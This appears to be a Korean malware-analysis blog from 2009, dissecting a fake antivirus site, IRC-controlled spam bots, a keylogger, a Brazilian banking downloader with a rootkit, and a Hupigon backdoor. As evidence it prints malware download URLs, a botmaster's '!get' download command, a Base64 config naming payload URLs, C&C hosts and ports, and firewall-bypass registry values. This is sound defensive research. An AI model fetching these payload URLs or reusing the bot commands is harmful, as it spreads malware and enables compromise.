malwareL4B

몇달 전에 3322.org를 대체할 만한 ddns 서비스라고 해서 optus.nu라는 걸 알게 됐었습니다.
그래서 추이를 살펴보고 있었는데 별 다른 특이사항은 없더군요..

oprus.nu로 검색을 하니 몇개의 도메인들이 나오는 듯 한데 그 중에서 하나가 수상해서 확인해 봤습니다.

hxxp://furowepulad.optus.nu/addicted-to-scrapbookingcom.html


사이트에 접속하면 뭔가를 막 하다가 아래와 같은 팝업창이 뜹니다.

악성코드가 많으니 빠르고(quick) 무료인(free) 스캐닝을 해라....라는 메시지군요...
확인을 클릭하면 아래처럼 화면이 바뀝니다.

누가 봐도 가짜라는 걸 알 수 있습니다.
요즘 같은 세상에 네티즌을 너무 무시하는 듯한 행동으로 보입니다. -_-
저는 파티션을 4개로 나눠서 쓰는데 2개 밖에 없다는군요..
일단 무슨 짓을 하는지 놔둬 봤습니다.

악성코드가 많아서 데이터 손실이 있을 수 있으니 빨리 치료하라는 군요..
확인을 누르면 팝업창이 뜨는 것처럼 화면이 바뀝니다.

전 Window 고전 테마를 쓰는데 뜨는 팝업창은 XP 테마군요...-_-
remove all을 클릭하든 다른 곳을 클릭하든지 간에 파일을 하나 다운로드 합니다.

파일명이 참...

실행해서 설치해 봤습니다.
설치하고 나니 랜덤한 사이트로 접속을 하고 있었습니다.

이렇게 몇분 정도 접속을 하다가 또 몇분 쉬었다가를 계속 반복합니다.

이런 접속을 시도하는 프로세스를 확인해보니 b.exe라는 파일이었습니다.

b.exe가 있는 폴더에 가니 몇개의 파일이 더 있습니다.

a.exe라는 파일도 보입니다.

b.exe는 계속 프로세스가 실행되어 있으면서 랜덤한 사이트로 접속을 하고 있었고 a.exe는 별다른 행동은 하지 않는 것으로 보입니다.


VirusTotal 결과

a.exe : http://www.virustotal.com/ko/analisis/e559346983d418f933362b1742a29e44d00ad0f653e0ff7864cb5ade520aee64-1245995846
b.exe : http://www.virustotal.com/ko/analisis/6c29b55322782b1c396fd046a471a012ceb71d43a2b400eadc7bf4969b025e65-1245996043
av-scanner.48248.exe : http://www.virustotal.com/ko/analisis/b57dc705d3bbd11501d993f83d5af56a583c98af5239911f81f6a94c00bc97e6-1245996464



질의하는 도메인이 너무 많아 모두 일일히 확인하기는 어려울 것 같은데 www.google.com이나 www.macromedia.com과 같은 사이트로도 접속하는걸로 봐서
특별히 문제가 되지 않을 듯 하지만 지속적으로 HTTP 트래픽을 발생시키기때문에 확인해보는게 좋을 듯 합니다.

DNS MX 쿼리 증가 및 스팸 메일을 발송하는 악성코드 #1에 이어서 IRC 서버 접속시 다운로드하는 파일들에 대해서 분석해보도록 하겠습니다.


a.php 파일이 실행된 후에는 두개의 파일이 생성되었고 4개의 서비스가 상태가 변경되었습니다.

그리고 brenz.pl에서 a.php를 다운로드하여 실행하면 lometr.pl 사이트에 특정 파일을 요청하는데
hxxp://lometr.pl/mega/lgate.php?n=C022499D00005058 요청시 해당 파일을 실행했던 폴더에 2B.tmp(파일명은 랜덤)라는 파일이 생성되고 이 파일의 내용은 아래와 같습니다.

MCBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx

Base64로 인코딩되어 있었으며 디코딩하면 다음과 같습니다.

0 http://brenz.pl/dll/abb.txt 1 http://brenz.pl/met/ge.txt 1

앞서 작성했던 글에서는 암호화되었다고 말씀드렸었는데 제가 제대로 확인을 안했었나 봅니다.
다시 보니 Base64일것 같아 디코딩해보니 URL이 두개가 나오는군요..

이 두개의 파일들은 위에서 보셨던 reader_s.exe와 services.exe 파일과 동일한 파일입니다.
즉, 다운로드 한 후 파일명을 바꿔서 실행을 시키는 것입니다. 파일이 동일하다는 것은 md5sum 해쉬값을 통해서 확인할 수 있었습니다.

두개의 파일을 받은 후에는 엄청난 양의 DNS MX 쿼리가 발생하였고 그로 인해 수많은 프로세스들이 생성되었었습니다.

위 캡쳐화면은 일부에 해당하고 이후에 더 많은 프로세스들이 생성되었었습니다.

a.php 파일을 디버거로 확인해보니 해당 파일 실행시 svchost.exe 프로세스를 생성하고 있었습니다.

0x0040372E에 있는 함수를 실행하면 아래와 같이 svchost.exe 프로세스가 생성만 됩니다.

프로세스 만든 후 메모리에 쓴 후

쓰레드를 재실행합니다.

쓰레드를 재실행하고 나면 다음과 같이 2F.tmp라는 자식 프로세스가 실행되고 이 프로세스에 의해 cmd.exe를 실행하고 윈도우 자체 방화벽 기능을 비활성화시키는 명령을 실행합니다. 그리고 services.exe라는 프로세스를 또 실행시키죠..

결국 brenz.pl에서 다운받은 a.php는 reader_s.exe(/dll/abb.txt)와 services.exe(/met/ge.txt)를 다운로드하여 실행하기 위함인 것을 알 수 있습니다.

지금까지 분석했던 내용을 도식화해보면 다음과 같습니다.

/dll/abb.txt에 의해 생성되는 reaser_s.exe가 스팸 메일을 다량으로 발송하는 프로세스였고
/met/ge.txt에 의해 생성되는 services.exe가 방화벽 기능과 같은 서비스들을 중지시키는 기능을 하고 있었습니다.



분석했던 3개의 파일(a.php, abb.txt, ge.txt)에 대한 바이러스토탈 결과입니다.

a.php : http://www.virustotal.com/ko/analisis/9cf7dfad11887fa34b7bd0eefc70909d9954e3dab3725c8f2800775826305c5f-1245646438
abb.txt : http://www.virustotal.com/ko/analisis/158dd590159ba699318ac8b8d92845a2a12649d0a8454c0ddb513b87a2774c6a-1245646516
ge.txt : http://www.virustotal.com/ko/analisis/652fa9658c088e9761daf5eed8eb40d64d93e5821cb91fa389c6bf98f869424f-1245646559


국내 백신 프로그램들은 대부분 탐지를 하고 있어서 백신 업데이트가 잘 이루어지고 있다면 크게 문제될 것이 없는 듯 보입니다.
대부분이라고 한 것은 일부 악성코드를 일부 백신 프로그램이 아직 탐지를 못하고 있어서입니다. 자세한건 위 링크를 참조하시면 되겠습니다.



www.upononjob.cn이나 horobl.cn이라는 도메인도 패킷 캡쳐시 잡혔었는데 www.upononjob.cn으로 접속시 horobl.cn으로 리다이렉션 되고 있었고
horobl.cn은 접속이 되지 않아 특별히 다른 행동을 하지 않는 것으로 보입니다.
접속이 안된다기 보다는 DNS 질의시 response가 없는 것으로 보아 도메인에 대한 IP가 없는 것으로 보입니다.

해당 악성코드는 아직 분석 중인데 급히 차단해야 할 도메인이 있어 분석 도중 포스팅합니다.

해당 악성코드를 실행하면 proxima.ircgalaxy.pl로 접속합니다.




IRC 서버로 유명한 녀석이죠..

재수 좋았던건지는 모르겠지만 봇 마스터를 다른 사이트에서 파일을 다운로드하라고 명령을 내리더군요

NICK kwfqkmyt USER d020501 . . :_Service Pack 3 JOIN &virtu :u. PRIVMSG kwfqkmyt :!get http://brenz.pl/ex/a.php

다운로드하는 파일은 exe 파일이었습니다.




그리고 나서 lometr.pl에 접속해서 /mega/lgate.php?n=5B3590E0FB840577 를 요청하고 brenz.pl에서 /dll/abb.txt 파일과 /met/ge.txt 파일을 다운로드하였습니다.






lometr.pl에 요청한 파일에 대한 결과는 암호화된 내용이라 어떤 내용인지 확인을 하지 못했습니다.

GET /mega/lgate.php?n=5B3590E0FB840577 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: lometr.pl Connection: Keep-Alive   HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Jun 2009 01:39:18 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.6 Content-Length: 80   MSBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx

추가적으로 www.upononjob.cn에서 특정 파일에 접근하고 나서 또 다른 도메인으로 리다이렉션되고 있었습니다.

GET /in.cgi?0032 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: www.upononjob.cn Connection: Keep-Alive   HTTP/1.1 302 Found Server: nginx Date: Fri, 19 Jun 2009 01:39:29 GMT Content-Type: text/html Connection: close Set-Cookie: SL_0032_0000=_1_; domain=www.upononjob.cn; path=/; expires=Sun, 19-Jul-2009 01:39:28 GMT Set-Cookie: TSUSER=0032; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=www.upononjob.cn Location: http://horobl.cn/index.html   <html> <head> <meta http-equiv="REFRESH" content="1; URL='http://horobl.cn/index.html'"> </head> <body> document moved <a href="http://horobl.cn/index.html">here</a> </body> </html>

보시는 것과 같이 horobl.cn으로 리다이렉션되는데 연결도 안되고 DNS에서 쿼리를 날려봐도 IP가 나오지 않았습니다.
악성코드 제작자가 실수한걸까요? ㅋ

이렇게 몇개의 도메인에 접속하고 파일 받고 하는 과정에서 몇개의 IP와도 특정 데이터를 송수신하고 있었는데 모두 암호화되어 있어서 확인을 못했습니다.
그리고 이후에는 루트 네임서버로 hotmail.com, gmail.com, web.de, aol.com, yahoo.com의 MX 레코드를 질의하더니 조금 후에는 랜덤한 DNS로 랜덤한 도메인에 대한 MX 레코드값을 질의하고 있었습니다.

질의 후에는 메일서버를 통해 스팸메일로 보이는 메일을 다량으로 보내고 있었습니다.





추가 도메인에서 받은 파일은 내일 분석해볼 생각입니다. ^^

허니넷을 통해 획득한 파일입니다.

File name : yeah.exe
File size : 66734 byte
md5sum : b6d37181c6c5fba6dbd115ca14f15141


처음 실행했을땐 별거 아니라 생각했는데 생각보다 재미있는 녀석이라 포스팅합니다. ^^;

해당 파일을 실행하면 alosha.endofinternet.org의 8333번 포트로 접속합니다.

접속시 뭔가 데이터를 전송하고 있는데 뭔지는 잘 파악이 안되는군요..-_-;;

접속 후 전송하는 내용을 보aus alosha.endofinternet.org:8333 웹 서버로 특정 데이터를 계속 전송하는데 POST 방식을 사용하고 있었고
URL은 날짜와 시간으로로 된 경로명의 jsp 파일로 전송하고 있었습니다.

하지만 최초 연결 후 패킷을 캡쳐하는 동안에는 별다른 데이터를 전송하지 않고 있었고 모두 Contect-Length가 0이었습니다.
이런 사실들로 미루어 보아 최초 접속 후에는 Health-Check를 하는게 아닌가 하는 생각이 듭니다.

그리고 TCPView로 확인해보면 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결되어 ESTABLISHED된 것을 확인할 수 있었습니다.

시스템에서의 변화는 파일이 4개가 생성되었고 서비스가 2개 추가되었습니다.

해당 서비스는 sbchost.exe를 통해서 서비스가 구동되고 있었고 해당 프로세스가 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결하고 있었습니다.

생성되었던 oschkl.rxr 파일이 위에 보이시는 yrxkzgfp 서비스를 구동하는 파일이었고 나머지 3개의 파일은 Network Connection Manager 서비스와
연관이 있는 파일이었습니다.

그런데 이 3개의 파일들이 모두 각각 특징을 가지고 있었습니다.

oschkl.hbv : 언제 어떤 프로세스를 실행했는지에 대한 기록 저장
oschkl.gtm : 사용자가 실행시킨 프로세스에 DLL 인젝션되는 파일
438d5.kol : 어디에 사용되는지 잘 모르겠지만 내용은 0만 가지고 있음

oschkl.hbv 파일은 IE를 후킹해서 오픈한 사이트와 입력한 문자열들도 모두 저장하고 있었습니다.
아래 그림을 보시면 시간 정보와 실행한 프로세스 혹은 선택한 프로그램에 대한 정보를 기록하고 있었고
naver.com에 접속해서 demantos라는 아이디와 hahaha라는 패스워드를 입력한 결과도 저장하고 있었습니다.

oschkl.htm은 현재 실행되고 있는 모든 프로세스에 DLL 인젝션되고 있었고 새로 실행되는 프로세스에도 인젝션을 하고 있었으며
모든 프로세스에서 발생되는 이벤트(?)들을 기록하고 있었습니다.

좀 더 확인을 해보니 사용자가 입력한 키값도 그대로 저장하고 있더군요(키보드 후킹)
아래 내용은 제가 시작 -> 실행에서 services.msc를 입력한 후 mmc.exe가 실행된 것을 후킹한 내용과 서비스 관리 메뉴에서 yrxkzgfp 서비스를 검색하기 위해
y를 두번 누르고 Network Connection Manager를 찾기 위해 net을 입력한 내용입니다.

지속적으로 모니터링을 했지만 alosha.endofinternet.org:8333로 oschkl.hbv 파일의 내용은 전송하지 않는 것으로 보입니다.
하지만 계속 연결이 되어 있는 것으로 보아 해당 도메인은 C&C 도메인일 가능성이 높고
공격자가 특정 명령을 수행하면 oschkl.hbv 파일의 내용을 가져갈 것으로 생각됩니다.


안타까운 사실은 역시나 국내 백신 엔진들이 아직 탐지를 못하고 있다는 것이었습니다.

http://www.virustotal.com/ko/analisis/5d6fa1ef7df98256cb9640cd3a6b2177567a90d289d271f121cedb7eabc0f0bc-1245119564

오랜만에 악성파일 하나 분석해봅니다.

파일 정보
File Name : ValePresente.exe
File Size : 415744 byte
md5sum : ae3bf41e03a3c770d3fbf8c6ed802d38

재미있게도 파일 아이콘이 이미지 파일의 아이콘이었습니다.

해당 파일을 실행하면 아래와 같은 팝업창이 뜹니다.
스페인어 같은데 무슨 말인지 모르겠습니다. 그냥 추측으로 뭔가 성공(sucesso)? 했다라는 이야기 같습니다.
악성코드가 잘 실행되었다? 라는 의미일지도 모르죠..

OK 버튼을 클릭하기 전까지는 실제 악성코드가 동작하지는 않습니다.
OK 버튼을 클릭하면 2개의 사이트에서 또 다른 바이너리 파일을 다운로드 합니다.




hxxp://agorasim001.tempsite.ws/ww/registro.exe
hxxp://************.co.kr/board/latest_skin/nzero/docu.exe

두번째 도메인은 국내 도메인이라 부득이하게 도메인명을 숨겼습니다.
대충 URL만 보더라도 제로보드라는 것을 알 수 있었습니다.

패킷을 떠보면 분명 두개의 파일을 받은걸로 나오는데 Winalysis 결과에서는 파일 변경사항이 없었습니다. -_-;;

이번에는 SysAnalyzer에서 돌려 봤더니 아래와 같은 내용들이 있었습니다.

CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       WriteFile(h=4d0)       RegOpenKeyExA (HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       WinExec(C:\Arquivos de programas\mssn.exe,0)       closesocket(4e8)       bind(4ec, port=0)       connect( 211.189.69.120:80 )       send(h=4ec)       recv(h=4ec)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       WriteFile(h=4b8)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       WinExec(C:\Arquivos de programas\wind32.exe,0)       ExitProcess()

파일을 다운로드는 하는 듯 한데 제가 직접 받았던 파일 사이즈와 약간 달랐습니다.
임시폴더에 있는 파일은 registro.exe가 29.9kbyte였는데 제가 직접 받았던 파일은 3.59Mbyte였습니다.
docu.exe 파일도 사이즈가 달랐습니다.

registro.exe 파일 생성(다운로드) 후 실행하는 mssn.exe과 docu.exe 파일을 생성한 후 실행하는 wind32.exe 확인 결과 모두 악성코드인 것으로 확인되었습니다.
wind32.exe는 agobot-bz 웜에 의해 생성되는 파일이었고 mssn.exe는 백도어였습니다.

다음 내용도 같이 보시겠습니다.

Urls   --------------------------------------------------   c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br   http://agorasim001.tempsite.ws/ww/registro.exe   http://wintergarden.co.kr/board/latest_skin/nzero/docu.exe   ...   ExeRefs   --------------------------------------------------   File: ValePresente_dmp.exe_   c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br   C:\Arquivos de programas\mssn.exe   http://agorasim001.tempsite.ws/ww/registro.exe   C:\Arquivos de programas\wind32.exe   http://wintergarden.co.kr/board/latest_skin/nzero/docu.exe

잘 보시면 Program FIles 경로가 명칭이 다른걸 확인할 수 있습니다.
아무래도 스페인어로 된 윈도우를 설치하면 Program Files가 Arquivos de programas라는 이름으로 폴더가 생성되는 듯 합니다.
(스페인어판은 설치를 안해봐서...)




----------------- 여기서부터는 C:\Arquivos de programas 폴더를 생성해서 접근~


Program Files 폴더가 폴더명이 안바뀌니 Arquivos de programas 폴더를 그냥 만들었습니다.
그리고 Arquivos de programas 폴더 아래에 Internet Explorer 폴더도 만들고 IEXPLORE.EXE 파일도 생성해놨습니다. -0-




그리고 악성코드를 실행해봤습니다.
c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br 는 익스플로러로 AMERICANAS 은행 사이트를 여는데 사용되었고 c:\Arquivos de programas 폴더에 mssn.exe, RunDLL31.exe, wind32.exe 파일이 생성되어 있었습니다.




WinExec(C:\Arquivos de programas\wind32.exe,0)에서 보셨듯이 wind32.exe를 실행을 하긴 하는데 프로그램에 약간 문제가 있는 듯 합니다.
정상적으로 실행이 안되고 있었습니다.




C:\Arquivos de programas 폴더를 만들고 실행을 하니 없을때와는 상당히 다른 양상을 보였습니다.
일단 위에서 보셨던 파일 3개가 생성되었구요 C:\WINDOWS\System32\drivers에 avgmfx90.sys 파일을 생성하였고
이 파일은 PCChips라는 서비스를 구동하는 파일이었습니다.

그런데 이 서비스는 services.msc 명령을 통해서 확인을 해봤는데 보이질 않아서 gmer와 IceSword를 실행해서 확인해보니
IceSword에서는 확인이 되지 않았고 gmer에서만 확인이 되었습니다.

구글신께 문의를 해보니 avgmfx90.sys 파일은 루트킷이라고 답변을 주시더군요..
http://www.threatexpert.com/report.aspx?md5=3f56e5b64b22a4db5534a3e472817a2f


mssn.exe 프로세스는 docu.exe를 다운 받았던 *****.co.kr 사이트에 연결이 된것 같은데 상태에는 CLOSE_WAIT 상태로
계속 남아 있었습니다. CLOSE_WAIT라면 얼마 후 연결이 끊겨야 정상인데 끊기지 않고 계속 프로세스에 보이고 있었습니다.




docu.exe와 registro.exe 파일은 다운로드된 후 각각 wind32.exe와 mssn.exe 파일을 생성하고 자기 자신은 삭제를 합니다.
즉, 동일한 파일을 생성하는 것이지요..




그리고 wireshark로 패킷을 캡쳐해본 결과 docu.exe 파일을 다운로드 한 뒤 FTP 사이트로 접속하는 걸 확인할 수 있었습니다.
docu.exe는 wind32.exe와 동일한 파일이고 wind32.exe는 실행시 에러가 발생했었습니다.


오늘(15일) 확인해보니 hxxp://************.co.kr/board/latest_skin/nzero/docu.exe을 다운로드하면 memo.swf 파일을 다운로드하고 있었습니다.
memo.swf 파일은 http://ryzeurhuhbfkakm.com/?BannerID=ddddd로 리다이렉션되고 있습니다.
위 사이트는 불법대출 사이트인듯 합니다. -_-




디버거로 정적분석을 해봐야 wind32.exe나 mssn.exe가 정확하게 무슨 행동을 하는지 알 수 있을 듯 합니다.
둘 다 패킹되어 있었고(Thinstall 2.4x - 2.5x -> Jitit Software) 언패킹을 해야하는데...


일단 정리를 해보면

1. 국내 사용자들에겐 그다지 치명적이지 않다.
앞에서 보셨다시피 C:\Arquivos de programas 폴더가 있어야지만 추가적인 행동들을 하고 있었습니다.
그리고 윈도우 한글판에는 C:\Arquivos de programas 폴더가 없습니다.
즉, 추가적인 악성코드가 다운로드/실행되지 않기 때문에 큰 문제가 되지 않는다.

2. 바이러스토탈 검사 결과 국내 백신 중 V3만 ValePresente.exe를 탐지하고 있었고 docu.exe, registro.exe는 모두 탐지하지 못하고 있었습니다.
ValePresente.exe : http://www.virustotal.com/ko/analisis/44df9075c347239c7f52569283a60eb01a167ba46a71d02c890b9df00a977f42-1245051342
docu.exe : http://www.virustotal.com/ko/analisis/3498fe15e33b645efa2c2135d9d1577b54b86a6b17e33a4610f48c265465d93e-1245051279
registro.exe : http://www.virustotal.com/ko/analisis/0702fd37a56ce6c8662c30a900abc6eb289c8b8ac043c2285ab003c0a29f5e54-1245051708




반쪽짜리 분석보고서였습니다. ㅜ.ㅜ
제대로 동작을 안한데다가 정적분석을 해야하는데 귀찮아서...-_-;;

어제 허니넷에서 획득한 파일 중 특이한 녀석이 있어서 분석해봤습니다.
그다지 특이하지 않을 수 있지만 보인에겐 좀 특이했습니다. -_-;;

일단 Dropper FTP에 접속하니 몇개의 파일들이 있었습니다.

이 중에서 다운로드하여 실행하는 악성코드는 JEW.EXE였습니다.
JEW.EXE외의 다른 파일들도 악성코드라 생각되어 Virustotal에 업로드해보니 FEG.EXE와 KICK.EXE는 악성코드가 아니라고 나왔고
TWAT.EXE는 40개 엔진 중 3개의 엔진에서만 악성코드로 탐지하고 있었습니다.
개인적으로 TWAT.EXE 파일이 뭔가 좀 의심스럽습니다. 추후 별도로 분석을 해볼 생각입니다.
바이러스토탈 결과는 제일 아래쪽 첨부하였으니 참고하시면 되겠습니다.


일단 JEW.EXE의 행동분석을 해봤습니다.

File size : 97,284 byte
md5sum : 32c4534068a9e83634b90aae40c8a1de

항상 그랬듯이 winalysis로 시스템의 변화를 살펴보았는데 레지스트리만 변경되고 파일이나 서비스 등 다른 항목에서의 변화는 없다고 나왔습니다.
그런데 확인 결과 winalysis가 저에게 거짓말을 하고 있었습니다. -_-

그런데 실제로는 C:\WINDOWS\system 폴더에 iexplorer.exe 파일이 생성되어 있었습니다.

iexplorer.exe는 JEW.EXE와 파일 사이즈 및 md5 해쉬값이 동일한 같은 파일이었습니다.

솔직히 지금까지 모르고 있었던게 우리가 사용하는 IE 브라우저의 파일명이 iexplore.exe라는 것입니다.
악성코드와 알파벳 r 하나 차이가 있습니다. 지금까지는 iexplorer.exe가 IE 브라우저의 파일명이라고 생각했었습니다.

아마 이 글을 읽고 계신 여러분들께서는 이러한 사실을 알고 계셨던 분들도 계실것이고 모르셨던 분들도 계셨을겁니다.
저는 오늘 알았습니다. ^^;


다시 본론으로 넘어오겠습니다.

악성코드 실행시 변경되는 레지스트리 중 다음과 같은 내용이 있었습니다.

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications   \List\C:\WINDOWS\system\iexplorer.exe    C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer   HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications   \List\C:\WINDOWS\system\iexplorer.exe    C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer

윈도우 방화벽 정책에서 해당 프로그램(iexplorer.exe)의 외부 접속에 대한 허용 설정을 하는 레지스트리였습니다.

그리고 악성코드 실행시 tl6.welovewarez.com으로 접속하는 것을 확인할 수 있었습니다.

여기서 좀 이상했던 점이 있었는데 tl6.welovewarez.com이나 welovewarez.com을 nslookup으로 확인해보면 85.17.141.84라는 아이피가 나옵니다.
85.17.141.84로 reverse lookup을 해보면 google.com이 나옵니다. 둘이 어떤 관계일까요? -_-;;

아무튼 tl6.welovewarez.com의 8782번 포트로 접속하는데 IRC 서버였습니다.
제가 접속할 당시에는 IRC에서 65.x.x.x:445로 랜덤 포트스캔 명령을 전달하고 있었습니다.

IRC서버에 접속해서 명령을 받아오는 프로세스는 앞에서 생성되었던 C:\WINDOWS\system\iexplorer.exe이고
65.x.x.x로 랜덤 포트 스캔도 해당 프로세스가 수행하고 있었습니다.

결국 JEW,EXE를 실행하면 C:\WINDOWS\system\iexploere.exe를 생성하고 이 파일은 tl6.welovewarez.com의 8782번 포트로 접속하는데
tl6.welovewarez.com은 C&C 서버였고 접속 당시 해당 C&C 서버에서 좀비에게 65.x.x.x:445 포트 스캔 명령을 내리고 있었습니다.

다행히 V3, nProtect, Virobot에서는 모두 탐지하고 있었습니다.



추가적으로 확인해봐야겠지만 FTP에 있던 다른 파일들도 JEW.EXE 파일과 연관성이 있지 않을까 하는 생각이 듭니다.
특히 TWAT.EXE는 파일 사이즈도 큰데다가 3개의 엔진에서만 악성코드로 탐지하고 있어서 분명 뭔가 있을 듯 합니다.

내일도 근무니 내일 한번 확인해봐야겠습니다.



아....이런.... 어리버리한 짓을 했습니다.
FTP에서 파일을 받을때 bin 옵션을 주지 않고 그냥 받았네요. -_-;;
덕분에 TWAT.EXE가 사이즈가 왜 다른가 했더니 ASCII 모드로 받아서 그랬습니다.
TWAT.EXE 다시 받았더니 SFX RAR 파일이군요..
거기다가 SCUM.EXE 파일이 추가되었습니다. (White Zombie의 Scum of the Earth가 생각 나는군요...^^;)
어제는 없었는데 확인해보니 어제 퇴근 후에 파일이 추가된 듯 합니다.
분석해볼께 하나 더 늘었군요~

확인해보니 SCUM.EXE는 JEW.EXE와 사이즈는 다르지만 행동은 동일한 듯 합니다.
시점의 차이인지 파일의 차이인지 바이너리를 까봐야 알겠지만 SCUM.EXE를 실행하면 91.x.x.x로 스캔을 하고 있었습니다.

TWAT.exe의 바이러스토탈 결과는 삭제했습니다.
압축 파일 안에 4개의 파일이 있으니 압축을 풀어서 분석해봐야겠습니다.


바이러스토탈 검사 결과

FAM.EXE
더보기FEG.EXE
더보기HO.EXE
더보기JEW.EXE
더보기KICK.EXE
더보기SCUM.EXE
더보기

성성된 파일 중 systemServer.exe는 서비스를 구동하기 위한 파일이었고 원본 악성코드와 동일한 사이즈를 가지고 있는 동일한 파일이었습니다.

systemServer 서비스 속성입니다.

systemServer.exe 파일은 spoolsv.exe, explorer.exe, winlogon.exe 프로세스가 실행되고 있는지 차례대로 검사합니다.
만약 있다면 해당 프로세스에 revreSmetsys.dll 파일을 인젝션시켜 실행시킵니다.

악성코드 실행 당시엔 spoolsv.exe 프로세스가 실행되고 있어서 spoolsv.exe에 revreSmetsys.dll을 인젝션시켜 실행시키고 있습니다.

그리고 spoolsv.exe 프로세스는 www.520iq.com/ip.txt 파일을 요청하는 HTTP 패킷을 전송합니다.
ip.txt 파일에는 http://124.72.93.158:8761 이라는 내용이 들어 있습니다.
이것은 124.72.93.158의 8761번 포트로 연결하라는 의미로 해석할 수 있습니다.

위 패킷을 보시면 124.72.93.158의 8761번 포트로 연결을 시도하지만 실제 연결은 되지 않고 있습니다.

즉, www.520iq.com은 거쳐가는 하나의 관문 정도로만 생각할 수 있고 실제 C&C 서버는 124.72.93.158일 가능성이 큽니다.
하지만 연결이 되지 않고 있기 때문에 정확하다고 말하기는 좀 힘들 듯 합니다.



어찌되었던 www.520iq.com과 124.72.93.158은 악성 사이트라고 간주할 수 있겠습니다.


아...그리고 zkeyHook.dll은 실행 당시 어떠한 프로세스에서도 사용하고 있지 않은 것으로 보아
124.72.93.158에 접속이 된 경우에 사용되는 파일인 것으로 추정되니다.



오늘도 빈약한 분석글 읽으시느라 고생하셨습니다.
앞으로는 좀 더 양질의 분석글이 되도록 하겠습니다. ^^;;\

허니넷 Dropper에서 획득한 파일에 대한 분석입니다.

획득한 파일의 파일 사이즈와 md5sum입니다.

File size : 552,960 byte
md5sum : 49a84bd7144ae8384b9fb2e01572f2ad

해당 파일 실행시 파일을 1개 생성하고 1개를 삭제하며 서비스를 1개 등록합니다.

삭제된 파일인 ieapfltr.dat는 피싱필터에 사용되는 파일이었습니다.

새롭게 생성되는 amdcpusetup.exe 파일은 원본 파일과 동일한 파일이었고 이 파일을 통해서 LanmandeQorkstation 서비스가 구동되고 있었습니다.

원본 파일과 동일한 사이즈를 가지고 있었으며 md5sum값도 동일하였습니다.
그리고 해당 파일은 LanmandeQorkstation 서비스를 구동하는 실행파일이었습니다.

그리고 해당 파일 실행 후 파일을 생성하고 서비스를 등록한 후에는 iexplorer 프로세스를 실행하여 www.gaogm.com으로 연결하고 있었습니다.

www.gaogm.com으로 접속한 후 ok.jpg 파일을 받는데 ok.jpg 파일은 이미지 파일이 아니고 아래 내용이 있었습니다.

http://61.131.15.131:8000/www/root/

처음에는 www.gaogm.com의 80번 포트로 연결을 하고 ok.jpg 파일을 다운 받은 후 8000번 포트로 연결하는 것을 확인하실 수 있습니다.
8000번 포트로 연결 후에는 클라이언트가 서버(www.gaogm.com)으로 자신의 운영체제 정보를 전송하고 있습니다.

Windows XP 5.1 (2600.Service Pack 3)............GUOCYOK88.....GUOC..

(중간에 일부 쓸데 없는 글자는 삭제하였습니다.)

8000번으로 접속 후 운영체제 정보를 전송하는 것으로 보아 www.gaogm.com 도메인은 C&C인 것으로 판단됩니다.
netbot과 같은 악성코드들에 감염된 PC들도 C&C 서버로 접속시 자신의 운영체제 정보를 전송하고 있었기 때문입니다.
확실한건 아니지만 지금까지 나왔던 패턴으로 보아 C&C일 가능성이 가장 큽니다.

그리고 V3나 Virobot, nProtect에서는 아직 탐지되지 않고 있었습니다.

안티바이러스	엔진 버전	정의 날짜	검사 결과
a-squared	4.0.0.101	2009.05.25	Backdoor.Win32.Hupigon!IK
AhnLab-V3	5.0.0.2	2009.05.25	-
AntiVir	7.9.0.168	2009.05.24	BDS/Hupigon.Gen
Antiy-AVL	2.0.3.1	2009.05.22	-
Authentium	5.1.2.4	2009.05.24	W32/Hupigon.K.gen!Eldorado
Avast	4.8.1335.0	2009.05.24	-
AVG	8.5.0.339	2009.05.24	BackDoor.Hupigon5.GHS
BitDefender	7.2	2009.05.25	Backdoor.Hupigon.AAFC
CAT-QuickHeal	10.00	2009.05.23	(Suspicious) - DNAScan
ClamAV	0.94.1	2009.05.24	-
Comodo	1157	2009.05.08	-
DrWeb	5.0.0.12182	2009.05.24	BackDoor.Pigeon.15147
eSafe	7.0.17.0	2009.05.24	-
eTrust-Vet	31.6.6519	2009.05.23	-
F-Prot	4.4.4.56	2009.05.24	W32/Hupigon.K.gen!Eldorado
F-Secure	8.0.14470.0	2009.05.25	-
Fortinet	3.117.0.0	2009.05.25	-
GData	19	2009.05.25	Backdoor.Hupigon.AAFC
Ikarus	T3.1.1.49.0	2009.05.25	Backdoor.Win32.Hupigon
K7AntiVirus	7.10.741	2009.05.21	-
